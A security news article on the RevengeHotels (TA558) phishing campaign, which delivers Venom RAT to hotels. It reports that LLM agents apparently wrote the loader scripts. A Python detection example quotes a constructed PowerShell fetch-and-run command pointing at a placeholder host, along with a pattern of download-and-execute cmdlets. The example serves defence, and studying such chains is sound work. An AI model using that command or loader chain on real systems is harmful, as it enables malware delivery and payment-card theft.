
The threat actor known as TA558 has been attributed to a new set of attacks that deliver a variety of remote access trojans (RATs), such as Venom RAT, to breach hotels in Brazil and Spanish-speaking markets.
Russian cybersecurity vendor Kaspersky, which observed the activity in the summer of 2025, tracks the cluster as RevengeHotels.
“Threat actors continue to adopt invoice-themed phishing emails to deliver Venom RAT implants via JavaScript loaders and PowerShell downloaders,” the company said. “It appears that most of the initial infector and downloader code for this campaign is being generated by large language model (LLM) agents.”
The findings point to a new trend among cybercriminal groups: leveraging artificial intelligence (AI) to enhance their tradecraft.
Known to be active since at least 2015, RevengeHotels has a history of targeting hospitality, hotel, and travel organizations in Latin America with the aim of installing malware on compromised systems.

Early iterations of the threat actor's campaigns distributed emails with crafted Word, Excel, or PDF documents attached. Some of them also served as a conduit for NanoCoreRAT and 888 RAT by exploiting a known remote code execution flaw in Microsoft Office (CVE-2017-0199).
Subsequent campaigns, documented by Proofpoint and Positive Technologies, have demonstrated the threat actor's ability to refine its attack chains to deliver a wide range of RATs, including Agent Tesla, AsyncRAT, FormBook, GuLoader, Loda RAT, LokiBot, Remcos RAT, Snake Keylogger, and VjW0rm.
The main goal of the attacks is to capture credit card data belonging to guests and travelers that is stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs), such as Booking.com.
According to Kaspersky, the latest campaign sends phishing emails written in Portuguese and Spanish on hotel booking and job application themes; recipients who click the fraudulent link download a JavaScript payload that runs under WScript.

“The scripts appear to be generated by a large language model (LLM), as they have a format similar to code generated by this type of technology, with similar comments and similar code,” the company said. “The main function of the script is to load subsequent scripts that further the infection.”
This includes a PowerShell script that fetches a downloader named “cargajecerrr.txt” from an external server and runs it via PowerShell. As the name suggests, the downloader fetches two additional payloads, including a loader responsible for launching the Venom RAT malware.
Based on the open-source Quasar RAT, Venom RAT is a commercial tool offered for $650 for a lifetime license. A one-month subscription that bundles the malware with HVNC and stealer components costs $350.
The malware is equipped with an anti-kill mechanism so that it can siphon data, act as a reverse proxy, and keep running uninterrupted. To achieve this, it modifies the discretionary access control list (DACL) associated with its running process to remove any permissions that could interfere with its functionality, and terminates running processes that match a hard-coded list.
“The second component of this anti-kill measure includes threads that run continuous loops, checking the list of running processes every 50 milliseconds,” Kaspersky says.
“The loops specifically target processes commonly used by security analysts and system administrators to monitor host activity and analyze .NET binaries.”
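The chain described above (a JavaScript file run by WScript that spawns PowerShell to fetch and execute a remote .txt downloader) leaves a recognizable process-creation pattern. The following is an added detection example, not Kaspersky's or the malware's code: it scores constructed Sysmon-style process events and flags PowerShell children of a script host that pull a remote payload. The event fields, the hypothetical host name example.invalid, and the sample events are all constructed for the example; only the file name cargajecerrr.txt comes from the report.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988, "image": r"C:\Windows\System32\WScript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\guest\Downloads\reserva_hotel.js"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WScript.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/cargajecerrr.txt')\""},
    {"pid": 5002, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},  # benign admin usage
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Cmdlets and aliases commonly used to fetch and run remote PowerShell in one line.
DOWNLOAD_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr\b|iex\b|invoke-expression)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of suspicious traits found in one PowerShell process event."""
    reasons = []
    if basename(ev["image"]) != "powershell.exe":
        return reasons
    if basename(ev["parent_image"]) in SCRIPT_HOSTS:
        reasons.append("powershell spawned by a script host")
    if DOWNLOAD_MARKERS.search(ev["cmdline"]):
        reasons.append("download/execute cmdlet in command line")
    url = URL_RE.search(ev["cmdline"])
    if url and url.group(0).lower().endswith(".txt"):
        reasons.append("remote payload served with a .txt extension")
    return reasons


def find_loader_chains(events, min_reasons=2):
    """Flag events that show at least `min_reasons` traits of the loader chain."""
    return [{"pid": ev["pid"], "ppid": ev["ppid"], "reasons": score_event(ev)}
            for ev in events if len(score_event(ev)) >= min_reasons]
```

Requiring two traits keeps a lone admin PowerShell download from firing while still catching the script-host-to-PowerShell-to-remote-.txt sequence.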

The anti-kill feature also sets up persistence on the host through changes to the Windows registry, relaunching the malware whenever its associated process is absent from the list of running processes.
If the malware runs with elevated privileges, it enables the SeDebugPrivilege token privilege and marks itself as a critical system process, allowing it to persist even when attempts are made to terminate the process. It also forces the computer to keep its display on and prevents it from entering sleep mode.
Finally, the Venom RAT artifacts incorporate the ability to spread through removable USB drives, terminate processes related to Microsoft Defender Antivirus, and tamper with the Task Scheduler and registry to disable security programs.
“RevengeHotels has significantly strengthened its capabilities and developed new tactics targeting the hospitality and tourism sector,” Kaspersky said. “With the support of LLM agents, the group was able to generate and modify phishing loaders and expand the attack into new regions.”